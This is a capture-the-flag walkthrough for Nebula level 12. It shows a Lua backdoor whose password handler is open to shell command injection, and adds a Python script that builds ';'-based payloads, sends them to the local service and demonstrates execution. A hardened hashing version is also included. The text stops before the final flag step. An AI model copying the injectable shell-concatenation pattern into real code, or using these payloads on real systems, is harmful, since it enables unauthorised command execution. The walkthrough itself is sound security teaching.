Nebula - 12


There is a backdoor process listening on port 50001.

To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.

Source code

local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
    -- The submitted password is concatenated straight into a shell command
    -- string and run through io.popen: no quoting, no escaping. This is the
    -- injection point; anything the shell treats specially is interpreted.
    prog = io.popen("echo "..password.." | sha1sum", "r")
    data = prog:read("*all")
    prog:close()
    data = string.sub(data, 1, 40) -- keep only the 40 hex chars of the digest
    return data
end

while 1 do
    local client = server:accept()
    client:send("Password: ")
    client:settimeout(60)
    local line, err = client:receive() -- reads one line, line terminator stripped
    if not err then
        print("trying " .. line) -- log from where ;\
        local h = hash(line)
        if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
            client:send("Better luck next time\n");
        else
            client:send("Congrats, your token is 413**CARRIER LOST**\n")
        end
    end
    client:close()
end

Getting the flag

The comment -- log from where ;\ caught my attention here. Looking at hash(), the reason is obvious: the password we send is concatenated directly into the shell command string "echo "..password.." | sha1sum" and handed to io.popen with no sanitization at all. That is the textbook shape of an OS command injection, so let's try the most common form of it.

To put it simply, we send something that looks like a password, then use a ; delimiter to terminate the echo command so that the shell executes a second command of our choosing. Two details matter. First, the injected command runs with the privileges of whatever user owns the backdoor process, not ours. Second, because the shell line is echo <input> | sha1sum and | binds tighter than ;, the stdout of our injected command is piped into sha1sum rather than sent back to us; the server never returns the popen output to the client anyway, only "Better luck next time" or the token. So the injected command has to redirect its output somewhere we can read it, for example into a file we own.
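As an added example (not code from the original write-up), the script below mirrors the level's vulnerable hash() in Python next to a hardened version that never touches the shell, builds the ; payload described above, and demonstrates the injection locally against the mirror so it can be run without the Nebula VM. The send_password() helper, the 127.0.0.1:50001 target taken from the level description, and the assumption that sh, sha1sum and id exist on the host are mine; the injected command id and the temp-file redirect are illustrative placeholders, not the level's intended command.

```python
# Added example for Nebula level 12 (not the write-up's own code).
# Assumptions: /bin/sh, sha1sum and id are available (Linux coreutils);
# send_password() is only useful against a live backdoor on 127.0.0.1:50001.
import hashlib
import os
import socket
import subprocess
import tempfile


def vulnerable_hash(password: str) -> str:
    """Python mirror of the Lua hash(): the password is spliced into a shell
    command string, so shell metacharacters in it are interpreted."""
    cmd = f"echo {password} | sha1sum"          # same string the Lua code builds
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
    return out[:40]                             # string.sub(data, 1, 40)


def safe_hash(password: str) -> str:
    """Hardened equivalent: hash in-process, no shell involved. echo appends a
    newline, so the trailing '\\n' keeps the digest identical for honest input."""
    return hashlib.sha1((password + "\n").encode()).hexdigest()


def build_payload(command: str, decoy: str = "x") -> str:
    """Password line (without terminator) that ends the echo with ';' and runs
    `command`. The shell sees:  echo <decoy>; <command> | sha1sum
    so the command's stdout still flows into sha1sum; redirect it to a file."""
    return f"{decoy}; {command}"


def send_password(line: str, host: str = "127.0.0.1", port: int = 50001) -> str:
    """Talk to the backdoor the way nc would: read the banner, send one line,
    return the reply. Expect 'Better luck next time' even when the injection ran."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(64)                      # "Password: "
        s.sendall((line + "\n").encode())  # client:receive() wants a line terminator
        return s.recv(256).decode(errors="replace")


def demo_local_injection() -> str:
    """Run the injection against the local mirror: the shell executes `id` and
    writes its output to a constructed temp file, proving code execution even
    though the digest comparison would fail."""
    marker = os.path.join(tempfile.mkdtemp(), "out")   # constructed scratch path
    vulnerable_hash(build_payload(f"id > {marker}"))
    with open(marker) as fh:
        return fh.read()


if __name__ == "__main__":
    print("honest digests match:", vulnerable_hash("level12") == safe_hash("level12"))
    print("injected command output:", demo_local_injection().strip())
```

Against the real backdoor the same idea is send_password(build_payload("<command> > /path/we/can/read")): the reply is still "Better luck next time", because the first 40 bytes of the popen output now begin with the echoed decoy rather than a digest, but the command has already run as the backdoor's user and its output is waiting in the file.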

Example:

By exploiting that vulnerability, we can also get the flag: